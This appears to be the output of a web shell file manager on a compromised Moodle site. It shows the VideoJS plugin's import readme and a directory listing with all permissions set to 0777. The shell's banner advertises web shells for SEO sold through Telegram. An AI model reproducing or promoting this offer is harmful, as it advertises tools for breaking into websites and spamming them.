__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
VideoJS 8.17.3
--------------
https://github.com/videojs/video.js
Instructions to import VideoJS player into Moodle:
1. Download the latest release from https://github.com/videojs/video.js/releases
(do not choose "Source code")
2. copy 'video.js' into 'amd/src/video-lazy.js'
3. copy 'font/' into 'fonts/' folder
4. copy 'video-js.css' into 'styles.css'
Add /* stylelint-disable */ in the beginning.
Maintain the css after "/* Modifications of player made by Moodle: */" to the end of the styles file.
Check status of:
https://github.com/videojs/video.js/issues/2777
6. copy 'lang/' into 'videojs/' subfolder (so the result will be media/player/videojs/videojs/lang).
Import plugins:
YouTube Playback Technology for VideoJS 3.0.1
---------------------------------------------
https://github.com/videojs/videojs-youtube
Instructions to import YouTube Playback Technology into Moodle:
1. Copy https://github.com/videojs/videojs-youtube/blob/master/dist/Youtube.js into 'amd/src/Youtube-lazy.js'
In the beginning of the js file replace
define(['videojs']
with
define(['media_videojs/video-lazy']
Ogv.js Playback Technology for VideoJS 1.0.0
---------------------------------------------
https://github.com/HuongNV13/videojs-ogvjs
Instructions to import Ogv.js Playback Technology into Moodle:
1. Download the latest release from https://github.com/HuongNV13/videojs-ogvjs/releases
(do not choose "Source code")
2. Copy Videojs-Ogvjs.amd.js into 'amd/src/videojs-ogvjs-lazy.js'
In the beginning of the js file:
Replace
define(['video.js', 'ogv']
with
define(['media_videojs/video-lazy', './local/ogv/ogv']
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| amd | Folder | 0777 |
|
|
| classes | Folder | 0777 |
|
|
| db | Folder | 0777 |
|
|
| fonts | Folder | 0777 |
|
|
| lang | Folder | 0777 |
|
|
| ogvjs | Folder | 0777 |
|
|
| pix | Folder | 0777 |
|
|
| tests | Folder | 0777 |
|
|
| videojs | Folder | 0777 |
|
|
| ogvloader.php | File | 6.93 KB | 0777 |
|
| readme_moodle.txt | File | 1.63 KB | 0777 |
|
| settings.php | File | 2.37 KB | 0777 |
|
| styles.css | File | 53.66 KB | 0777 |
|
| thirdpartylibs.xml | File | 2.87 KB | 0777 |
|
| version.php | File | 1.12 KB | 0777 |
|